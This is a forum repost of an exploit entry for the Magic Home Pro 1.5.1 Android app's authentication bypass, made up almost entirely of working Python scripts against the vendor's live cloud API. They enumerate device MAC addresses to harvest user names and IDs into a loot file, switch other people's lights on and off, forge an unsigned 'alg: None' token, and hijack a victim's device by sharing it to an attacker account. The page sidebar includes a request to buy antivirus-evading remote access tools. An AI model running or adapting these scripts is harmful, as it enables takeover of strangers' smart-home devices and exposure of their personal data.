Magic Home Pro 1.5.1 - Authentication Bypass

发布于3月5日3月5日

Members

# Exploit Title: Magic Home Pro 1.5.1 - Authentication Bypass 
# Google Dork: NA
# Date: 22 October 2020
# Exploit Author: Victor Hanna (Trustwave SpiderLabs)
# Author Github Page: https://9lyph.github.io/CVE-2020-27199/
# Vendor Homepage: http://www.zengge.com/appkzd
# Software Link: https://play.google.com/store/apps/details?id=com.zengge.wifi&hl=en
# Version: 1.5.1 (REQUIRED)
# Tested on: Android 10

## Enumeration ##

import requests
import json
import os
from colorama import init
from colorama import Fore, Back, Style
import re

'''
1. First Stage Authentication
2. Second Stage Enumerate
3. Third Stage Remote Execute
'''

global found_macaddresses
found_macaddresses = []
global outtahere
outtahere = ""
q = "q"
global token


def turnOn(target, token):

    urlOn = "https://wifij01us.magichue.net/app/sendCommandBatch/ZG001"
    array = {
        "dataCommandItems":[
            {"hexData":"71230fa3","macAddress":target}
        ]
    }
    data = json.dumps(array)
    headersOn = {
        "User-Agent":"Magic Home/1.5.1(ANDROID,9,en-US)",
        "Accept-Language": "en-US",
        "Accept": "application/json", 
        "Content-Type": "application/json; charset=utf-8",
        "token":token,
        "Host": "wifij01us.magichue.net",
        "Connection": "close",
        "Accept-Encoding": "gzip, deflate"
    }
    print (Fore.WHITE + "[+] Sending Payload ...")
    response = requests.post(urlOn, data=data, headers=headersOn)
    if response.status_code == 200:
        if "true" in response.text:
            print (Fore.GREEN + "[*] Endpoint " + Style.RESET_ALL + f"{target}" + Fore.GREEN + " Switched On")
        else:
            print (Fore.RED + "[-] Failed to switch on Endpoint " + Style.RESET_ALL + f"{target}")

def turnOff(target, token):

    urlOff = "https://wifij01us.magichue.net/app/sendCommandBatch/ZG001"
    array = {
        "dataCommandItems":[
            {"hexData":"71240fa4","macAddress":target}
        ]
    }
    data = json.dumps(array)
    headersOff = {
        "User-Agent":"Magic Home/1.5.1(ANDROID,9,en-US)",
        "Accept-Language": "en-US",
        "Accept": "application/json", 
        "Content-Type": "application/json; charset=utf-8",
        "token":token,
        "Host": "wifij01us.magichue.net",
        "Connection": "close",
        "Accept-Encoding": "gzip, deflate"
    }
    print (Fore.WHITE + "[+] Sending Payload ...")
    response = requests.post(urlOff, data=data, headers=headersOff)
    if response.status_code == 200:
        if "true" in response.text:
            print (Fore.GREEN + "[*] Endpoint " + Style.RESET_ALL + f"{target}" + Fore.GREEN + " Switched Off")
        else:
            print (Fore.RED + "[-] Failed to switch on Endpoint " + Style.RESET_ALL + f"{target}")

def lighItUp(target, token):

    outtahere = ""
    q = "q"
    if len(str(target)) < 12:
        print (Fore.RED + "[!] Invalid target" + Style.RESET_ALL)
    elif re.match('[0-9a-f]{2}[0-9a-f]{2}[0-9a-f]{2}[0-9a-f]{2}[0-9a-f]{2}[0-9a-f]{2}$', target.lower()):
        while outtahere.lower() != q.lower():
            if outtahere == "0":
                turnOn(target, token)
            elif outtahere == "1":
                turnOff(target, token)
            outtahere = input(Fore.BLUE + "ON/OFF/QUIT ? (0/1/Q): " + Style.RESET_ALL)

def Main():
    urlAuth = "https://wifij01us.magichue.net/app/login/ZG001"

    data = {
        "userID":"<Valid Registered Email/Username>",
        "password":"<Valid Registered Password>",
        "clientID":""
    }

    headersAuth = {
        "User-Agent":"Magic Home/1.5.1(ANDROID,9,en-US)",
        "Accept-Language": "en-US",
        "Accept": "application/json", 
        "Content-Type": "application/json; charset=utf-8",
        "Host": "wifij01us.magichue.net",
        "Connection": "close",
        "Accept-Encoding": "gzip, deflate"
    }

    # First Stage Authenticate

    os.system('clear')
    print (Fore.WHITE + "[+] Authenticating ...")
    response = requests.post(urlAuth, json=data, headers=headersAuth)
    resJsonAuth = response.json()
    token = (resJsonAuth['token'])

    # Second Stage Enumerate

    print (Fore.WHITE + "[+] Enumerating ...")
    macbase = "C82E475DCE"
    macaddress = []
    a = ["%02d" % x for x in range(100)]
    for num in a:
        macaddress.append(macbase+num)

    with open('loot.txt', 'w') as f:
        for mac in macaddress:
            urlEnum = "https://wifij01us.magichue.net/app/getBindedUserListByMacAddress/ZG001"
            params = {
                "macAddress":mac
            }

            headersEnum = {
                "User-Agent": "Magic Home/1.5.1(ANDROID,9,en-US)",
                "Accept-Language": "en-US",
                "Content-Type": "application/json; charset=utf-8",
                "Accept": "application/json",
                "token": token,
                "Host": "wifij01us.magichue.net",
                "Connection": "close",
                "Accept-Encoding": "gzip, deflate"
            }

            response = requests.get(urlEnum, params=params, headers=headersEnum)
            resJsonEnum = response.json()
            data = (resJsonEnum['data'])
            if not data:
                pass
            elif data:
                found_macaddresses.append(mac)
                print (Fore.GREEN + "[*] MAC Address Identified: " + Style.RESET_ALL + f"{mac}" + Fore.GREEN + f", User: " + Style.RESET_ALL + f"{(data[0]['userName'])}, " + Fore.GREEN + "Unique ID: " + Style.RESET_ALL + f"{data[0]['userUniID']}, " + Fore.GREEN + "Binded ID: " + Style.RESET_ALL + f"{data[0]['bindedUniID']}")
                f.write(Fore.GREEN + "[*] MAC Address Identified: " + Style.RESET_ALL + f"{mac}" + Fore.GREEN + f", User: " + Style.RESET_ALL + f"{(data[0]['userName'])}, " + Fore.GREEN + "Unique ID: " + Style.RESET_ALL + f"{data[0]['userUniID']}, " + Fore.GREEN + "Binded ID: " + Style.RESET_ALL + f"{data[0]['bindedUniID']}\n")
            else:
                print (Fore.RED + "[-] No results found!")
                print(Style.RESET_ALL)

        if not found_macaddresses:
            print (Fore.RED + "[-] No MAC addresses retrieved")
        elif found_macaddresses:
            attackboolean = input(Fore.BLUE + "Would you like to Light It Up ? (y/N): " + Style.RESET_ALL)
            if (attackboolean.upper() == 'Y'):
                target = input(Fore.RED + "Enter a target device mac address: " + Style.RESET_ALL)
                lighItUp(target, token)
            elif (attackboolean.upper() == 'N'):
                print (Fore.CYAN + "Sometimes, belief isn’t about what we can see. It’s about what we can’t."+ Style.RESET_ALL)
            else:
                print (Fore.CYAN + "The human eye is a wonderful device. With a little effort, it can fail to see even the most glaring injustice." + Style.RESET_ALL)

if __name__ == "__main__":
    Main()

## Token Forging ##

#!/usr/local/bin/python3

import url64
import requests
import json
import sys
import os
from colorama import init
from colorama import Fore, Back, Style
import re
import time
from wsgiref.handlers import format_date_time
from datetime import datetime
from time import mktime

now = datetime.now()
stamp = mktime(now.timetuple())

'''
HTTP/1.1 200
Server: nginx/1.10.3
Content-Type: application/json;charset=UTF-8
Connection: close

"{\"code\":0,\"msg\":\"\",\"data\":{\"webApi\":\"wifij01us.magichue.net/app\",\"webPathOta\":\"http:\/\/wifij01us.magichue.net\/app\/ota\/download\",\"tcpServerController\":\"TCP,8816,ra8816us02.magichue.net\",\"tcpServerBulb\":\"TCP,8815,ra8815us02.magichue.net\",\"tcpServerControllerOld\":\"TCP,8806,mhc8806us.magichue.net\",\"tcpServerBulbOld\":\"TCP,8805,mhb8805us.magichue.net\",\"sslMqttServer\":\"ssl:\/\/192.168.0.112:1883\",\"serverName\":\"Global\",\"serverCode\":\"US\",\"userName\":\"\",\"userEmail\":\"\",\"userUniID\":\"\"},\"token\":\"\"}"
'''

def Usage():
    print (f"Usage: {sys.argv[0]} <username> <unique id>")

def Main(user, uniqid):
    os.system('clear')
    print ("[+] Encoding ...")
    print ("[+] Bypass header created!")
    print ("HTTP/1.1 200")
    print ("Server: nginx/1.10.3")
    print ("Date: "+str(format_date_time(stamp))+"")
    print ("Content-Type: application/json;charset=UTF-8")
    print ("Connection: close\r\n\r\n")

    jwt_header = '{"typ": "JsonWebToken","alg": "None"}'
    jwt_data = '{"userID": "'+user+'", "uniID": "'+uniqid+'","cdpid": "ZG001","clientID": "","serverCode": "US","expireDate": 1618264850608,"refreshDate": 1613080850608,"loginDate": 1602712850608}'
    jwt_headerEncoded = url64.encode(jwt_header.strip())
    jwt_dataEncoded = url64.encode(jwt_data.strip())
    jwtcombined = (jwt_headerEncoded.strip()+"."+jwt_dataEncoded.strip()+".")
    print ("{\"code\":0,\"msg\":\"\",\"data\":{\"webApi\":\"wifij01us.magichue.net/app\",\"webPathOta\":\"http://wifij01us.magichue.net/app/ota/download\",\"tcpServerController\":\"TCP,8816,ra8816us02.magichue.net\",\"tcpServerBulb\":\"TCP,8815,ra8815us02.magichue.net\",\"tcpServerControllerOld\":\"TCP,8806,mhc8806us.magichue.net\",\"tcpServerBulbOld\":\"TCP,8805,mhb8805us.magichue.net\",\"sslMqttServer\":\"ssl:\/\/192.168.0.112:1883\",\"serverName\":\"Global\",\"serverCode\":\"US\",\"userName\":\""+user+"\",\"userEmail\":\""+user+"\",\"userUniID\":\""+uniqid+"\"},\"token\":\""+jwtcombined+"\"}")

if __name__ == "__main__":
    if len(sys.argv) < 3:
        Usage()
    else:
        Main(sys.argv[1], sys.argv[2])

## Device Takeover PoC ##

#!/usr/local/bin/python3

import url64
import requests
import json
import sys
import os
from colorama import init
from colorama import Fore, Back, Style
import re

def Usage():
    print (f"Usage: {sys.argv[0]} <attacker email> <target email> <target mac address> <target forged token>")

def Main():

    attacker_email = sys.argv[1]
    target_email = sys.argv[2]
    target_mac = sys.argv[3]
    forged_token = sys.argv[4]

    os.system('clear')
    print (Fore.WHITE + "[+] Sending Payload ...")
    url = "https://wifij01us.magichue.net/app/shareDevice/ZG001"

    array = {"friendUserID":attacker_email, "macAddress":target_mac}

    data = json.dumps(array)

    headers = {
        "User-Agent":"Magic Home/1.5.1(ANDROID,9,en-US)",
        "Accept-Language": "en-US",
        "Accept": "application/json", 
        "Content-Type": "application/json; charset=utf-8",
        "token":forged_token,
        "Host": "wifij01us.magichue.net",
        "Connection": "close",
        "Accept-Encoding": "gzip, deflate"
    }
    
    response = requests.post(url, data=data, headers=headers)
    if response.status_code == 200:
        if "true" in response.text:
            print (Fore.GREEN + "[*] Target is now yours ... " + Style.RESET_ALL)
        else:
            print (Fore.RED + "[-] Failed to take over target !" + Style.RESET_ALL)

if __name__ == "__main__":
    if len(sys.argv) < 5:
        Usage()
    else:
        Main()

引用

Mention

查看数 698
已创建 3月5日3月5日
最后回复 3月5日3月5日

参与讨论

你可立刻发布并稍后注册。如果你有帐户，立刻登录发布帖子。

https://www.ishack.org/topic/2629.html/

粉丝

转到主题列表

欢迎来到红帽社区

红帽社区是由多名网络技术爱好者共同创建的社区论坛，您可以在底部选择语言和切换主题颜色，欢迎您的加入。

求购免杀远控
求购免杀远控

textile430发布主题帖子在蓝队取证审计网络安全

大家好。求购一款可以免杀的pc 远控，可以看到对方的电脑屏幕
- 40分钟前40分钟
- 0篇回复
全球500强信赖的代理IP服务，Smart Proxy让数据采集更简单！
全球500强信赖的代理IP服务，Smart Proxy让数据采集更简单！

Smartproxy海外IP发布主题帖子在建站VPS工具综合杂谈

Smart Proxy —— 全球领先的代理IP与数据解决方案平台服务全球数万家企业，赋能数据驱动型决策作为世界500强企业信赖的代理网络服务商，Smart Proxy 专注于为全球客户提供安全、稳定、高效的海外代理IP解决方案，助力企业突破数据壁垒，精准触达目标市场。核心优势：技术领先，服务无忧全球最大IP资源库，精准覆盖 9600万+ 纯净IP池：覆盖 220+ 国家及地区，提供住宅代理与数据中心代理双模式。高活跃动态IP：美国日活跃IP超 250万，英国超 60万（日更新率 15%），确保IP高可用性。城市级精准定位：支持按需选择IP地理位置，满足精细化业务需求。企业级稳定与安全 99.9% 可用性：24小时智能监控系统，专业团队实时响应。无限制并发与带宽：支持HTTP/HTTPS/SOCKS5协议，适配高并发场景。纯净IP资源：严格过滤黑名单IP，保障数据采集合法性。灵活适配全场景品牌保护 | 竞品分析 | 广告验证 | SEO监控市场调研 | 舆情监控 | 旅游数据聚合 | 金融数据采集支持API集成，轻松对接企业系统。为什么选择Smart Proxy？ ✅ 国内市场份额第一，全球代理池规模前三 ✅ 唯一承诺：纯净IP + 无并发/带宽限制 ✅ 免费测试体验，零风险验证效果限时福利：访问官网注册，即赠 0.5G动态住宅IP流量！中国官网: Smart proxy中国官网 V X : Renxiaobo____ 立即行动，开启高效数据之旅！
- 昨天 05:431天前
- 0篇回复
红龙逆向工具箱2025最新版(ISHACK改良版)
红龙逆向工具箱2025最新版(ISHACK改良版)

popy评论 ISHACK的文件的评论在红队武器库

Already expired
- 4月15日4月15日
- 0篇回复
Smart proxies新增50W美国IP池，诚邀您进行测试！！
Smart proxies新增50W美国IP池，诚邀您进行测试！！

Smartproxy海外IP发布主题帖子在建站VPS工具综合杂谈

你是否在尋找一款穩定、高效的IP代理工具，助力你的網路爬蟲、跨境電商、資料收集、遊戲加速或社群媒體管理？ Smart Proxy 為你提供大量高匿IP資源，全球覆蓋，安全穩定，滿足各類業務需求！為什麼選擇Smart proxies？海量IP池－覆蓋全球200+國家地區，輕鬆切換不同地區IP；高匿穩定－HTTP、HTTPS、SOCKS5協定支持，高匿名度，安全穩定；高速連線－優質線路，低延遲，確保流暢體驗；性價比高－彈性套餐，隨選購買，低成本高收益；便利操作－API呼叫支持，一鍵切換IP，適用於各種應用場景。適用場景：爬蟲資料收集，突破反爬限制跨境電商，防關聯操作遊戲加速，暢玩全球服社媒行銷，多帳號管理限時優惠活動現在註冊 Smart proxies，新用戶可享專屬折扣，更有免費流量等你體驗！官網位址： SmartProxies-涵盖全球220地区-真实纯净全球动态住宅ip 私人訂位；聯絡专属客戶經理：中国官网:https://www.smartproxycn.com/?keyword=0xweaz0l V X : Renxiaobo____
- 4月15日4月15日
- 0篇回复
Smart proxies－高速穩定IP代理，全球資源供你選擇
Smart proxies－高速穩定IP代理，全球資源供你選擇

Smartproxy海外IP发布主题帖子在建站VPS工具综合杂谈

你是否在尋找一款穩定、高效的IP代理工具，助力你的網路爬蟲、跨境電商、資料收集、遊戲加速或社群媒體管理？ Smart Proxy 為你提供大量高匿IP資源，全球覆蓋，安全穩定，滿足各類業務需求！為什麼選擇Smart proxies？海量IP池－覆蓋全球200+國家地區，輕鬆切換不同地區IP；高匿穩定－HTTP、HTTPS、SOCKS5協定支持，高匿名度，安全穩定；高速連線－優質線路，低延遲，確保流暢體驗；性價比高－彈性套餐，隨選購買，低成本高收益；便利操作－API呼叫支持，一鍵切換IP，適用於各種應用場景。適用場景：爬蟲資料收集，突破反爬限制跨境電商，防關聯操作遊戲加速，暢玩全球服社媒行銷，多帳號管理限時優惠活動現在註冊 Smart proxies，新用戶可享專屬折扣，更有免費流量等你體驗！官網位址： SmartProxies-涵盖全球220地区-真实纯净全球动态住宅ip 私人訂位；聯絡专属客戶經理：中国官网:https://www.smartproxycn.com/?keyword=0xweaz0l V X : Renxiaobo____
- 4月7日4月7日
- 0篇回复

登录

Magic Home Pro 1.5.1 - Authentication Bypass

recommended_posts

参与讨论

欢迎来到红帽社区

社区动态

求购免杀远控

全球500强信赖的代理IP服务，Smart Proxy让数据采集更简单！

红龙逆向工具箱2025最新版(ISHACK改良版)

Smart proxies新增50W美国IP池，诚邀您进行测试！！

Smart proxies－高速穩定IP代理，全球資源供你選擇

帐户

导航

搜索

登录

参与讨论

欢迎来到红帽社区

求购 免杀远控

全球500强信赖的代理IP服务，Smart Proxy让数据采集更简单！

红龙逆向工具箱2025最新版(ISHACK改良版)

Smart proxies新增50W美国IP池，诚邀您进行测试！！

Smart proxies－高速穩定IP代理，全球資源供你選擇

求购免杀远控